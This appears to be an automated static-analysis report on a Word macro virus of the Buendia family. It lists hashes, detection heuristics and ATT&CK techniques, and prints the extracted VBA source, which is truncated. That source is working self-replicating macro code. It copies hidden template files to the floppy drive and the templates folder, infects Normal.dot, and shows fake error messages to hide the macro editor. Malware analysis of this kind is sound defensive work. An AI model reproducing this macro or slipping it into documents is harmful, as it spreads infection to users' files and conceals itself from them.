Buendia — Office (OLE) malware analysis

Static analysis result for SHA-256 23751a1d36136127…

MALICIOUS

Office (OLE)

40.5 KB Created: 1998-03-30 09:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: fc41d074effb32f0bbeaefd66dea11dd SHA-1: f90d49285cd94ae07353e26c4b8c4b87313c1437 SHA-256: 23751a1d361361277328ae4a7bb791622d2c88c2a6c750ae0c89ff223f87aef1
140 Risk Score

Malware Insights

Buendia · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro attempts to copy itself to the user's template directory, indicating a self-propagation mechanism. The ClamAV detection 'Doc.Trojan.Buendia-1' strongly suggests the Buendia family. The macro's intent is to spread itself by copying its template files.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4140 bytes
SHA-256: fa50a1e79e6d76707990f4c6e91fff99166dc6511dacecd239590fc5f6f581b7
Detection
ClamAV: Doc.Trojan.Buendia-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo21"
'               MACRO 21
'               ========
' Macro programada y diseñada por RCH. Está
' dirigida a poder demostrar que no es tan dificil
' diseñar un virus que se expanda por ahí.
'
' La gracia que hace de mandar un mensaje el día
' 11 está dedicado a mi novia, con la que empecé
' a salir justamente en un día 11
'
' Este virus no tiene malas intenciones, solo
' intenta difundirse y alegrar un poco el mundo
'
'                            RCH
'                            ---
'
'

Sub AutoOpen()
On Error GoTo seguir
   FileCopy "a:\~wd11.tmp", Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp"
   SetAttr Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", vbSystem + vbHidden
   FileCopy "a:\~wd11.tmp", Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp"
   SetAttr Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", vbSystem + vbHidden
   Options.SaveNormalPrompt = False
   Copiar_Macros
seguir:

On Error GoTo continua
ActiveDocument.AttachedTemplate = "~wd07.tmp"
continua:

Application.ShowVisualBasicEditor = False

End Sub
Sub Copiar_Macros()
On Error Resume Next
    Application.OrganizerCopy Source:="A:\~wd07.tmp", Destination:= _
        NormalTemplate.FullName, Name:= _
        "Módulo21", object:=wdOrganizerObjectProjectItems
Exit Sub
End Sub
Sub ArchivoNuevo()
On Error Resume Next
Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End Sub
Sub ArchivoNuevoPredeter()
On Error Resume Next
    Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End Sub
Sub AutoNew()
On Error Resume Next
If Documents.Count = 0 Then
    Documents.Add Template:= _
        Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd07.tmp", _
        newtemplate:=False
End If
End Sub
Sub AutoExec()
On Error Resume Next
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd11.tmp"
If Err.Number <> 0 Then GoTo seguir
   SetAttr "a:\~wd11.tmp", vbSystem + vbHidden
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd07.tmp"
   SetAttr "a:\~wd07.tmp", vbSystem + vbHidden

seguir:
If Day(Date) = 11 Then
    MsgBox ("Hoy es un buen día " + Application.UserName)
    Application.OnTime When:=Now + TimeValue("00:01:00"), Name:="Mensaje"

End If

If Application.Documents.Count = 0 Then
    Documents.Add Template:= _
        "C:\Archivos de programa\Microsoft Office\Plantillas\~wd07.tmp", _
        newtemplate:=False
End If

End Sub

Sub AutoExit()
On Error Resume Next
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd11.tmp"
If Err.Number <> 0 Then GoTo fin
   SetAttr "a:\~wd11.tmp", vbSystem + vbHidden
   FileCopy Application.Options.DefaultFilePath(Path:=wdUserTemplatesPath) + "\~wd11.tmp", "a:\~wd07.tmp"
   SetAttr "a:\~wd07.tmp", vbSystem + vbHidden
fin:
End Sub
Sub ViewVBcode()
    a = MsgBox("No pudo encontrar o iniciar Microsoft Visual Basic.", vbExclamation)
End Sub

Sub HerramMacro()
    a = MsgBox("No pudo encontrar o iniciar Visor de Macros.", vbExclamation)
End Sub
Sub mensaje()
    a = MsgBox("Realmente hoy es un buen día", vbExclamation)
End Sub
Sub FileOpen()
On Error Resume Next
    AutoExit
    Dialogs(wdDialogFileOpen).Show
End Sub
Sub FileSaveAs()
On Error Resume Next
    AutoExit
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileSave()
On Error Resume Next
    AutoExit
    Application
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.